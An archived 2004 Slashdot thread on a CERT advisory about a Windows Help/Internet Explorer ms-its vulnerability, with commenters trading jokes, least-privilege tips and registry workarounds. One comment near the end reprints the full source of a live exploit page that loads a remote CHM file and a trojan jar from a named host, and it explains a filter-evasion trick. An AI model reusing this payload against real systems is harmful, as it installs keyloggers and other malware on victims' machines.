Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
Bug Internet Explorer Security The Internet

New Windows Vulnerability in Help System 576

Posted by CowboyNeal
from the decidedly-unhelpful-paperclips dept.
wesleyt writes "CERT announced today a significant Microsoft Windows vulnerability related to IE and its handling of the Windows help subsystem. There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild. Because the vulnerability is in the help subsystem, even users who avoid Outlook and IE are vulnerable, since IE is the default handler for help files. It seems that this is going to be an ugly one."
This discussion has been archived. No new comments can be posted.

New Windows Vulnerability in Help System

Comments Filter:
  • MS (Score:5, Funny)

    by Fredbo (118960) on Friday April 09, 2004 @04:06AM (#8813410) Homepage
    Microsoft is in some serious need of some help on this...
    • Re:MS (Score:5, Funny)

      by netsharc (195805) on Friday April 09, 2004 @04:59AM (#8813617)
      "It seems like you're trying to exploit a security hole. Would you like help?"
  • by Anonymous Coward on Friday April 09, 2004 @04:07AM (#8813414)
    I am sure the major virus scanners will have it before anything "really" bad happens.. this isnt anything special.. move along
    • As a mac user I'm just glad that our beleaguered platform that's now full of trojans has a competitor and hopefully this upstart Windows will take some of the attention away. phew!
    • Not the point (Score:5, Insightful)

      by bangular (736791) on Friday April 09, 2004 @06:03AM (#8813772)
      That's not the point. MS has tried to lead the public to believe that there's never been an instince of exploit code before their patch. And obviously if there's exploit code out there, something already "really bad" has happened. This comes after the witty worm spread before ISS had patches for their products.

      On a related note, MS pretty much NEVER releases advisory's on their own will before a patch. There almost always has to be a 3rd party that has said they are going to go public, or there have to be exploits or information in the wild. With that information, I wonder if this exploit is related to the windows source leak. The source leak had a lot of IE code, and if there are exploits in the wild before MS could even send out an advisory. That would lead me to the possiblity that the windows source leak could be the source of this one.
      • Re:Not the point (Score:5, Insightful)

        by Vancorps (746090) on Friday April 09, 2004 @07:31AM (#8814038)
        The code was for IE5, this is very unlikely. And a patch is available, its called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.

        As for MS statements about exploits, well... everyone knows that's just plain silly. Right now there is an Exchange vulnerability listed on CERT that contains no patch and several known exploits, has been that way since November.

        This is yet another occasion to teach everyone how to run as a user in Windows and not as Administrator. Almost everything is negated or at least mitigated when they are just normal users. Sure it could wipe out their own documents, but it couldn't effect any others and certainly couldn't harm the operating system.

        I see this problem a lot on every platform, generally I think people like to feel in control all the time

        • by RowdyReptile (660760) on Friday April 09, 2004 @08:12AM (#8814317)
          The code was for IE5, this is very unlikely. And a patch is available, its called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.

          Is that all you have to do? I just stopped and disabled the "Help and Support" service in WinXP Home. But then when I try "Help and Support" from the Start menu, that service switches itself to Automatic and starts again! Of course I won't be opening H&S any time soon.. but if "disabled" doesn't mean much, will it stop a virus? Or just start itself back up again?
          • by Vancorps (746090) on Friday April 09, 2004 @08:19AM (#8814387)
            You need to disable it with the resource kit. Disabling in the services snapin doesn't actually disable the service. I hate that about how its setup, it makes you think disabled is actually disabled but the SYSTEM user can turn it back on at any time even if the user has to change it back to turn it on themself.

            This method is more desirable [microsoft.com] If you disable it for real then as I understand it it would prevent a virus from doing anything.

            • by IceAgeComing (636874) on Friday April 09, 2004 @10:10AM (#8815552)
              Windows has this reputation for "it just works!".

              Yet the parent's post clearly shows that if you actually have to change anything fundamental, such as Services or Registry cleanups, it's a total fucking nightmare.

              No wonder Windows admins get nervous, and sometimes run away screaming from changing Exchange configs, secure file sharing across networks, and nearly daily virus updates.

              Am I forgetting anything?

  • Privilege level (Score:5, Insightful)

    by Gary Destruction (683101) * on Friday April 09, 2004 @04:08AM (#8813417) Journal
    "could allow an attacker to execute arbitrary code with the privileges of the user running IE" This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry.
    • Re:Privilege level (Score:5, Insightful)

      by Phexro (9814) on Friday April 09, 2004 @04:13AM (#8813444)
      They also don't have permission to do most things that users are used to doing, such as installing new software.

      Not saying that your comment is wrong, just that for most people, convenience is more important than security.
      • Re:Privilege level (Score:3, Interesting)

        by pe1chl (90186)
        To install new software, users (except the totally clueless) log in as an administrative user, or even choose to run the setup program as an administrative user while being logged in as an unprivileged user.

        Unfortunately, the default distribution of Windows is not setup this way, and is even discouraging it (especially in the Home version).
        • Re:Privilege level (Score:5, Insightful)

          by Halfbaked Plan (769830) on Friday April 09, 2004 @04:29AM (#8813513)
          I used to try running Windows 2000 as a non-privledged user.

          The problem is, not every Windows program out there is written to be aware of the fine-grained security model of Windows NT. In a 'perfect world' every Windows developer would code properly, with security in mind. As it stands, the complex NT security model is just ignored by a lot of people. It might work great in a locked-down corporate environment with a limited-set of software, i.e. where the user isn't allowed to install anything, and the software installed is a narrow well-tested set. It won't ever work in looser environments. Given the lax 'security culture' of Microsoft and it's user base, it's unworkable.
          • Re:Privilege level (Score:5, Insightful)

            by pe1chl (90186) on Friday April 09, 2004 @04:34AM (#8813534)
            This is like saying that keylocks work well in a bank, but will never be workable in normal life. People will lose keys, will find it uncomfortable to carry keyrings, etc.

            Sure there is some truth in that, but as more and more people don't respect other people's property, keylocks have become a necessity and have to be lived with, no matter the discomfort.

            The same is now happening with software security.
            • if i have to re-educate my users to be aware of security, i may as well re-educate them to a better thought out environment.

              To extend the lock metaphor well beyond any rationality: i'll teach them to use keys instead of a "dance and sing" ritual... "you have to log in as root to do this and that" instead of "you have to right click and selct this, unless its september or a full moon when you have to double click here and then do this that and this other step; except for full moons during september when yo

            • To extend your analogy to fit better, consider a world in which many doors, windows, cabinets, etc. are designed in such a way that it's impossible to install a key lock. Others are designed so that a keylock can be installed, but there's only one supply anywhere in the world for key blanks for that particular lock. So you can't lock certain places at all, because you only have one key, and there are five of you who need access to that cabinet or room.
          • Mod Parent UP! (Score:5, Interesting)

            by Chordonblue (585047) on Friday April 09, 2004 @05:07AM (#8813634) Journal
            Where's my friggin points when I need them?

            Look, this is absolutely true. There is still plenty of software out there that breaks under W2K/WXP when not run as a local administrator.

            And forget 'looser' environments. I run a network at a private school. Care to take a guess how much educational software cares about following the rules properly? Grrr!!!

          • Re:Privilege level (Score:5, Informative)

            by cerberusss (660701) on Friday April 09, 2004 @06:19AM (#8813812) Homepage Journal
            I still run Windows 2000 as a non-privileged user. But whenever apps act funny as a normal user, I go to administrator mode and hand out full control over the appropriate directory in \Program Files. That usually solves the problem.
          • Re:Privilege level (Score:3, Informative)

            by Theaetetus (590071)
            The problem is, not every Windows program out there is written to be aware of the fine-grained security model of Windows NT. In a 'perfect world' every Windows developer would code properly, with security in mind.

            Excellent point. Happens on both platforms, actually - Digidesign's audio editor "ProTools" insists on being run as an Administrator and will not let anyone non-Administrator run it. Their reasoning is that somehow ProTools has magic abilities to delete files that users don't have permissions for

      • Re:Privilege level (Score:5, Informative)

        by Gary Destruction (683101) * on Friday April 09, 2004 @04:19AM (#8813473) Journal
        Use the runas service to do administrative stuff. You can either use it in command line form or hold down shift and right click on an executable. It works on most control panel applets as well.
    • Re:Privilege level (Score:5, Insightful)

      by harlows_monkeys (106428) on Friday April 09, 2004 @04:17AM (#8813467) Homepage
      This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry

      So basically, then, that makes it so that if the user gets infected by something, all it can do is destroy that user's personal files, and propogate over the network, as opposed to doing all that AND making the user have to reinstall Windows by mucking with system stuff?

      That's nice for administratos--they can clean the machine just by wiping that user, but for the user that is not going to make much difference.

      • Re:Privilege level (Score:5, Insightful)

        by DA-MAN (17442) on Friday April 09, 2004 @04:24AM (#8813492) Homepage
        So basically, then, that makes it so that if the user gets infected by something, all it can do is destroy that user's personal files, and propogate over the network, as opposed to doing all that AND making the user have to reinstall Windows by mucking with system stuff?

        That's nice for administratos--they can clean the machine just by wiping that user, but for the user that is not going to make much difference.


        Let's see, 1 hour of downtime while we reimage and reconfigure your machine vs. 1 minute to clear out your profile and let me work on pulling your data from a good known back up.
      • Re:Privilege level (Score:5, Interesting)

        by TheLink (130905) on Friday April 09, 2004 @05:15AM (#8813657) Journal
        Login as your usual restricted user for your normal stuff (wordprocessing etc), e.g. joe

        Right click on the IE/browser shortcut, select run as different user e.g. www_joe.

        Then give www_joe permissions to joe's browser directories, or point the browser files to different folders in the registry/config files.

        Of course this doesn't protect against shatter attacks etc.

        So run IE in a VMware virtual machine and rollback after each session (copy out the data you want before that). VMware Workstation is now USD189 prev was USD299 or some high price.
    • Re:Privilege level (Score:5, Informative)

      by goat_attack (127983) <goatattack@notsoh o t m a i l . com> on Friday April 09, 2004 @04:23AM (#8813485)
      Unfortunately many programs and especially games require you have admin access to work, i.e. The Sims (god knows why). Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.

      This is a much broader problem than merely stupid/lazy users.

      • by Gary Destruction (683101) * on Friday April 09, 2004 @04:32AM (#8813528) Journal
        The RUNAS service will allow you to run an executable with elevated privileges. And shortcuts have the option to run as a different user by clicking the check box that says,"Run as different user." To use the RUNAS service, just hold down shift and right-click and you'll see an option that says "Run As".
        • by plugger (450839)
          It doesn't always work though. If you are accessing files through a mapped network drive letter, a program run as administrator won't see the virtual drive.

          It doesn't work as well as 'su -c xxx', I wish it did.
      • Re:Privilege level (Score:5, Interesting)

        by ymgve (457563) on Friday April 09, 2004 @07:55AM (#8814163) Homepage
        Games need Administrator privileges because the copy protection systems use driver tricks that are only available to administrators. Yet another reason why copy protection should be abolished.
      • by gosand (234100) on Friday April 09, 2004 @08:11AM (#8814306)
        Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.

        Somewhere in Linux-land, a phone rings....

        Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it? Good job. OK, open up a terminal.... it's a command line interface, where you type commands. Much more powerful than a GUI. Where did you save the file? You don't remember? Hmm. Just type "cd". Now type "ls". Do you see the file name? Great! OK, type "tar -zxf "

        It didn't work? What does it say? OK. What is the name of the file you downloaded? Oh, well, that is a bzip file, not a tar and gzipped file. So type the same thing as before, but use "bzip2" instead of "tar".

        What? Why didn't it work? Oh, it doesn't have the same syntax. Crap. Go to the man page. Oh, man stands for manual. Type "man bzip2". What does it say?

        (20 minutes later)

        OK, now we have uncompressed the files you need. No, not yet. Type "./configure" No, it's OK, it is figuring out what kind of computer and software you have.

        OK, now type "make" OK, call me back when it is done.

        (15 minutes later)

        OK, now type "make install" What? Why not? What does it say? No, not that. Oh, wait, you have to be root. It is an administrator user.
        Because not just everyone can install programs, for security reasons. Look, just change to the admin user by typing "su". OK, now enter the root password. I DON'T KNOW! You mean you don't know your root password?

        (10 minutes later)

        Mom, you should NOT use the dog's name as the password. Because it is insecure! Nevermind. Just type "make install". There. Now it is installed.

        No, there is no icon, you have to type the name of program to run it. Type it. What? I don't know, what was the name of the binary after you compiled it? A binary file is a program you run. You compiled it when you typed "make". Hmm, let's look in the Makefile. Type "vi Makefile". What do you mean it is blank? Oh, wait. Use capital M. Type ":r Makefile" with a capital M.

        OK, now you are in vi, the most powerful editor ever. WHAT DO YOU MEAN YOU PREFER EMACS!!!!

        • Phone rings.

          Hi mom. You want to install a program? Ok, what's it called?

          Great! Now open a terminal window. It's a command line interface and it's much more powerful than a gui. Got it open? Great. Now you have to become the superuser, so type 'su' and then put in the password.

          You don't know your root password? Ask dad.

          Ok, great, so now you're root. Now type "urpmi", a space, and the name of the program you wish to install.

          It's asking for the CD that contains the program. Put that CD in and fo

        • Re:In Linux-land... (Score:3, Interesting)

          by cmacb (547347)
          "Somewhere in Linux-land, a phone rings....

          Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it? Good job. OK, open up a terminal...."


          Very funny, and very true.

          I learned my lesson the hard way. I GAVE someone an older machine fully configured and ready to go with Debian installed. I did this after they constantly complained to me how their two Windows systems were messed up. I suggested that they use Linux to at le
        • by OoSync (444928) <wellsed@@@gmail...com> on Friday April 09, 2004 @09:51AM (#8815298)
          Somewhere in Linux-land, a phone rings....

          Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it?


          Okay, hang on for a moment.



          $ ssh moms.computer.net



          It'll be done in just a sec, Mom!

    • Re:Privilege level (Score:4, Insightful)

      by Anonymous Coward on Friday April 09, 2004 @04:29AM (#8813518)
      > Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories

      Typicall stupid techie answer.

      Restricted users have write or modify permission on the critical business files and databases. Which are 8 thousands times more important to the business than your average winnt directory.

      Get out of your mom basement.
    • Re:Privilege level (Score:5, Insightful)

      by Florian Weimer (88405) <fw@deneb.enyo.de> on Friday April 09, 2004 @05:15AM (#8813656) Homepage
      "could allow an attacker to execute arbitrary code with the privileges of the user running IE" This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry.

      Even a user without admin privileges can turn the box into a spam relay (or a DDoS agent), so reducing privileges is only a very partial solution.
    • Windows XP sets up its users with full administrator privileges by default and without a password.

      The simple Control Panel even hides the management interface to make granular security possible.

      The truth is, in order for NT to work in consumer homes, it had to behave just like DOS versions of Windows did.

      Joe Sixpack may be computer illiterate, but his dollar is what ultimately fills Microsoft's coffers.
    • Re:Privilege level (Score:3, Informative)

      by WoodstockJeff (568111)
      This is why you run as a restricted user rather than administrator or power user.

      This advice works well. And, I wish I could follow it universally on client machines. Unfortunately, any user that needs to syncronize their Palm Pilot with Outlook can't, unless they're an administrator. So every "executive" must have adminstrator privilages for their machine, even though they're also the least likely to understand the security implications of this.

      Also, some virus scanners can't update their signature fil

  • Windows XP SP2 (Score:5, Informative)

    by Anonymous Coward on Friday April 09, 2004 @04:08AM (#8813418)
    Although there's no specific patch, the Windows XP SP2 release candidate [microsoft.com] mitigates this problem.
  • Horrible (Score:5, Funny)

    by S.I.O. (180787) on Friday April 09, 2004 @04:09AM (#8813423)
    > and no virus definitions for the major scanners

    Jesus, even my ScanJet is vulnerable?

    • That depends: How long has it been since you last used a strong desinfectant to clean the scanner? If you don't do this before every scan, you might end up digitizing a virus. God knows what would happen if someone would accidently scan the AIDS-virus.

      Prevent virii, sterilize you scanners before use.
  • by d3am0n (664505) on Friday April 09, 2004 @04:09AM (#8813424)
    Most of us here have already modified our systems knowing that having even the IE exe file or outlook express exe file could cause problems and have removed it (even in spite of the hidden little annoying backup). Remember to get rid of IE be sure to look in the folder /windows/system32/dllcache for those backup exe files that it uses to restore when you try and rip IE or outlook out yourself.
  • Today? (Score:5, Informative)

    by Troed (102527) on Friday April 09, 2004 @04:09AM (#8813426) Homepage Journal
    They announced this TODAY? It has been discussed on Bugtraq for weeks - and due to a few comments I made in their discussion forum the Swedish IDG.se reported this last Friday. I've also linked to one of the PoC-exploits here on Slashdot for people check for themselves. ... what took them so long?

    Jelmer's PoC is good: link [planet.nl]

    (That page is the info page, you won't get hit by clicking on the link directly)
    • Re:Today? (Score:3, Insightful)

      by Albanach (527650)
      They clearly discussed the announcment with their international partners - half of Europe are on holiday today, Good Friday and again on Monday.

      I'd imagine lots of the IT bods that are stil working will have had major work scheduled for this weekend for weeks. Just as well there isn't a patch to be deployed!

  • by rapiddescent (572442) on Friday April 09, 2004 @04:10AM (#8813436)
    now would be a very good time to start the clocks to see how long it takes them to get a patch out. Should be a good case in point for the forrester research published last week. rd
    • by exmsfty (695351) on Friday April 09, 2004 @04:37AM (#8813545)
      Well, the interesting thing to me is I was a contract tester on the HTMLHELP team in 1999...and I filed a bug report for this very exploit. So by my stopwatch we are at 5 years and counting. FWIW, I used this exploit to nuke my boss's computer via the "Goodtimes" virus...yea, it was a hoax, but with this exploit I could run "rd /s/q \winnt" from the Preview Pane of Outlook :) If you care then write ShaneMc@microsoft.com and ask him why it wasn't fixed 5 years ago.
      • by Anonymous Coward
        He's been busy trying to get that damned virus off of his machine.
      • by value_added (719364) on Friday April 09, 2004 @07:58AM (#8814196)
        I'm not suprised. I'm reasonably familiar with the format as I've authored numerous CHM files and spent even more time re-compiling others (removing those HTMLHelp-specific features that MS and anyone following their lead insists on adding that I consider both nutty and inappropriate). IIRC, development stopped on v1.x a long time ago, and the much heralded new help system has some real problems of its own. A number of existing bugs for v1.x have been documented for some time, like those referred to here [helpware.net]. Others, well, for years no one at MS has shown any interest in fixing anything unless it involves an embarrassing exploit.

        It's too bad, really. I'm not at all impressed with what little MS has done with the format (it still strikes me as afterthought), but compiled HTML can be a blessing. Anyone with tens of thousands of HTML docs on their drive (a handful of O'Reilly books?), can appreciate the simplicity of a single file.

  • Afraid (Score:5, Interesting)

    by InternationalCow (681980) <mauricevansteensel.mac@com> on Friday April 09, 2004 @04:22AM (#8813480) Journal
    I don't know about the rest of you, but things like these are actually scaring me out of running Windows. Apart from my powerbooks (no problems there) I have one PC laptop on which I run WinXP and Linux and I like to use Windows for its ACPI support, but I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network. Brrrr. No Windows any longer, I'm sick and tired of being afraid when using my computer.
    • Re:Afraid (Score:3, Funny)

      by SnowDog_2112 (23900)
      I don't know about the rest of you, but things like these are actually scaring me out of running Windows.

      If you stop using windows, the terrorists have already won!! :P
  • Workaround (Score:5, Informative)

    by KingRob (698441) on Friday April 09, 2004 @04:25AM (#8813494)
    Remember to backup your registry (or at least this portion of it)
    From the CERT article:

    Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.

    Disable ITS protocol handlers
    Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Ha nd ler\{ms-its,ms-itss,its,mk}
    Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.

    Follow good Internet security practices
    These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities.

    Disable Active scripting and ActiveX controls

    NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.

    Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.

    Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.

    Do not follow unsolicited links
    Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

    Maintain updated anti-virus software
    Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

    • by jotaeleemeese (303437) on Friday April 09, 2004 @06:14AM (#8813801) Homepage Journal
      There you are, all your user friendliness rubish, that Linux is ready for the desktop.

      How would Joe Average, Jose Sixpack, Aunt Tillie, your Mom, my Mom, Granma, Grandpa, the children, would react if faced with such arcane, incomprehensible instructions.

      In Windows everything is easy, In Windows everything is one click away.

      You Linux zealots are the sux0r.
  • CERT Solution (Score:5, Informative)

    by nuffle (540687) on Friday April 09, 2004 @04:27AM (#8813506)
    the CERT article has the following to say about the solution.
    Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.


    Disable ITS protocol handlers

    Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Hand ler\{ms-its,ms-itss,its,mk}

    Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.
  • by tuxlove (316502) on Friday April 09, 2004 @04:38AM (#8813548)
    ... that not publishing vulnerabilities doesn't stop exploits. This one had exploits long before the vulnerability was known to anyone but the hackers. I have to laugh every time MS whines about how problems would go away if vulnerabilities were never disclosed, except to the vendor of course. The only thing that might go away is the bad PR, if even that.
  • well (Score:5, Funny)

    i loaded up ie, went help... contents and index... search... and typed in"help subsystem vulnerable" and hit list topics

    a pop up box announced "no topics found"

    so what is everyone talking about? this doesn't seem to be a problem
  • mean trick (Score:4, Funny)

    by Ruliz Galaxor (568498) on Friday April 09, 2004 @04:46AM (#8813575)
    this is probably some kind of mean trick from mister Linus to discourage the use of Windows. I don't believe in this vulnera...

    hey, where did my files go?
  • by AnonymousDot (517935) on Friday April 09, 2004 @04:46AM (#8813578) Homepage
    Create a .REG file with this content:
    REGEDIT4

    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ PROTOCOLS\Handler\its]
    [-HKEY_LOCAL_MACHINE\SOFTW ARE\Classes\PROTOCOLS\Handler\mk]
    [-HKEY_LOCAL_MA CHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-its]
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Ha ndler\ms-itss]
    Remove the spaces that slashcode adds!

    Save it as chm-disable.reg
    Put a line like this in your logon script:
    regedit /s chm-disable.reg
    Use the same trick to restore the values when a patch is available (that means that you must save the HANDLER keys first).
    Note: If you're still using batch files: KiXtart is your friend!
  • I wonder... (Score:3, Funny)

    by Ruliz Galaxor (568498) on Friday April 09, 2004 @04:50AM (#8813593)
    how to format my harddisk. Maybe Windows-help can provide me with some support. *clickety-click*

    sig(h)
  • WAIT!!! (Score:3, Funny)

    by The Ancients (626689) on Friday April 09, 2004 @04:52AM (#8813597) Homepage
    we haven't finished talking about the OS X security hole. Damn MS always has to get market dominance in everything they do...
  • ie rants (Score:4, Interesting)

    by bmac (51623) on Friday April 09, 2004 @05:02AM (#8813625) Journal
    I use a "custom level" for my internet zone. I basically turn off *everything*. I don't need java, and "active scripting" should be re-worded to say "give web pages access to God-knows-what?".

    Besides, I really despise the "AppletTransition Sensor" that ESPN and other sites use. Screw `em. Just give me the dang HTML and, please, IE, just render it for me. No code, no scripts, no popups, no crap.

    Websites that require JavaScript piss me off. The stupid Washington Post can't even render a page without JavaScript. What a terd.

    Now, if only I could get IE to stop displaying the "Your browser doesn't allow ActiveX controls" message that pops up on pages where the designer used some crap control. I've made ActiveX controls and I *know* they can do anything they want on my system. Arg.

    And wtf is with "install desktop items"? This is a *web* *browser*, not the control panel, for crying out loud.

    And, last but not least, when I disable all this crap and then hit apply, it gives me a confirm warning message, but when I (because I need to use JavaScript on some crappy page) restore the default "cheap-whore-mode" settings, it doesn't say a word! Nice emphasis, Microsoft.

    Yeah, I know, use a different browser (or OS), but we all know Windows is *designed* to not interoperate well with those things, right? Sometimes, it wastes time to try to fight inertia.

    Anyhow, my feeling is that the desktop situation on Linux and BSD won't be solved until X is ditched completely. Just give me the dang screen buffer(s) and some basic routines and I'll draw my own shtuff. X is a 25-year-old terd, designed for machines with, like, 4k of memory (warning: hyperbole). Just give me font, line, point, ellipse, bitblt and friggin window data structures -- straight to the video card. And access to the video card reg's would be nice too.

    End of Rant, enjoy your day.

    Peace & Blessings,
    bmac
    • Re:ie rants (Score:5, Insightful)

      by nuffle (540687) on Friday April 09, 2004 @05:34AM (#8813708)
      Yeah, I know, use a different browser (or OS), but we all know Windows is *designed* to not interoperate well with those things, right? Sometimes, it wastes time to try to fight inertia.
      In other words, it's easier to complain than do anything about it.

      Sounds like the lynx browser (or links, w3m, etc) is right up your alley. Lots of other people who share your distaste for browser bloat do. Microsoft doesn't really care too much about those people who say "Ugh, Microsoft IE sucks! Oh, yeah, I still use it though". It's only until people say "IE sucks, that's why I use [whatever] instead" that they'll pay attention.

      Funnel your enthusiasm into trying some different browsers that fit your needs. Donate some time or money, maybe, to an open source browser you do like.

      At this point, though, a "IE is lame" post doesn't really contribute much to the discussion. Or have I been trolled?
  • But but but... (Score:5, Informative)

    by Jesrad (716567) on Friday April 09, 2004 @05:10AM (#8813644) Journal
    ...but Mr MS-Security himself said that there were NO exploits prior to the security patches !
  • by tekrat (242117) on Friday April 09, 2004 @05:54AM (#8813750) Homepage Journal
    That's it! I'm buying a Mac!

    "The more I use Windows, the more I love my Commodore 64"
  • Dear Microsoft.. (Score:5, Insightful)

    by adeyadey (678765) on Friday April 09, 2004 @06:10AM (#8813796) Journal
    Why did you make it so bloody difficult to switch off html content in recieved Email text? AT best, it meant bandwidth guzzling spam, at worst viruses you didnt even have to open to catch..

    As to browser/plug-in vulnerabilities, it may never be possible to eliminate them all, there are just too many niches for a virus to gain foothold.
  • MS Fanboys.... (Score:3, Insightful)

    by jotaeleemeese (303437) on Friday April 09, 2004 @06:20AM (#8813816) Homepage Journal
    Are you happy now, or do we still need to educate you why modularity is a better design compromise?

    Thanks to MS decision to embed IE into everything in WIndows makes Windows a breeding ground fro vulnerabilities.

  • by Kagami001 (769862) on Friday April 09, 2004 @06:23AM (#8813821)
    I ran a few quick tests on a couple of different Windows XP systems using the proof of concept exploit code here. [planet.nl]

    ---------
    Windows XP Professional Service Pack 1

    Mozilla Firebird 0.8 run as limited user: no apparent effect
    Mozilla Firebird 0.8 run as administrator: no apparent effect

    Internet Explorer 6 run as limited user causes an Internet Explorer Script Error:

    Line 47, Char: 5, Error: Write to file failed, Code: 0
    URL: ms-its:mhtml:file://C:\foo.mht!http://ip3e83566f.s peed.planet.nl/security/newone/modified//EXPLOIT.C HM::/exploit.htm

    Internet Explorer 6 run as administrator: demo exploit runs as expected

    A software restriction policy is in place on this machine, forbidding the execution of any executable files (including .chm) in any directories except for the ProgramFilesDir and System directories, but, as you can see, it did not stop the sample code from executing when IE was run with administrator privileges.
    ------------

    Windows XP Professional Service Pack 2 RC 1

    Internet Explorer 6 run as administrator: no apparent effect

    Fixed in SP2?
    ---------------

    One thing that concerns me about using this particular sample code as a test, is that it seems to rely on having write permission to \Program Files, thus requiring administrator privileges (usually) and thus making limited user accounts appear to be invuelnerable -- but are they? Can a version of this exploit be written that runs even if the user does not have write privileges to the program files and system directories? (Thus giving access to all of the limited user's files.) In such a case, would software restriction policies prevent the execution of the exploit exe even if not stopping the script itself?
  • Workaround...? (Score:5, Insightful)

    by dargaud (518470) <[ten.duagradg] [ta] [2todhsals]> on Friday April 09, 2004 @06:57AM (#8813911) Homepage
    I don't know about that specific vulnerability, but I always suspected something fishy about the chm files. They can run javascript and whatever else you compile into them with full user priviledge. Yes, I write chm files. I think a workaround is to disable Javascript and other scripting at the local intranet security level in IE options.
  • by Junior J. Junior III (192702) on Friday April 09, 2004 @07:05AM (#8813935) Homepage
    Considering how seldom the idiot^H^H^H^H^H^H users actually use the help function whre I work, it shouldn't be a problem. It seems they regard the IT Support "Help Desk" as their first place to look when they ought to be using the online Help function in that seemingly invisible menu at the right side of their window.
  • by HSpirit (519997) on Friday April 09, 2004 @08:45AM (#8814636)

    The other day my boss called me over to check out a suspicious looking email that had made it's way past SpamAssassin. It rendered blank, but looking at the raw message code revealed it was using just this kind of exploit (with a <FORM> to obfuscate what was really happening).

    My boss' account has Restricted User privileges, with Eudora as the MUA and Mozilla as the browser, so no panic, but the fact that spammers are already using this is scary.

  • by roca (43122) on Friday April 09, 2004 @09:20AM (#8814974) Homepage
    Mozilla is not vulnerable.

    There are two kinds of protocol handlers in Windows: system-wide and IE-specific. Mozilla supports the system-wide protocols but not the IE-specific protocols. ms-its is an IE-specific protocol.

    We should probably take a second look at the system-wide protocols, though. Currently we blacklist some and let the rest through.
  • by _pi-away (308135) on Friday April 09, 2004 @01:15PM (#8817748) Homepage
    I found this page yesterday, it is an exploit of this vulnerability.

    WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SERVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!

    The link is here.
    http://hard-virgins.com/sher/test.html

    For those who don't want to follow it, here is the page source.

    <html><head>
    </head><body>
    <textarea id="cxw" style="display:none;">
    <object data="${PR}" type="text/x-scriptlet"></object>
    </textarea>

    <script language="javascript">
    document.write(cxw.value.replace(/\${PR}/g,'&#109; s-its:mhtml:file://c:\\nosuch.mht!http://hard-virg ins.com/sher/x.chm::/x.htm'));
    </script>
    <applet width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET>
    </body></html>

    This loads and runs the x.chm file from
    http://hard-virgins.com/sher/x.chm

    and also the loader.jar file from
    http://hard-virgins.com/sher/loader.jar

    Loader.jar contains the Byte.Verify Trojan to gain full access.

    Notice the use ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex &#109; (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).

    I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for ansering my question /.

    BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) than norton will stop these exploits from running and delete them, but they still get on your system just fine.

    So careful out there, this exploit is dangerous.

Are you having fun yet?

Working...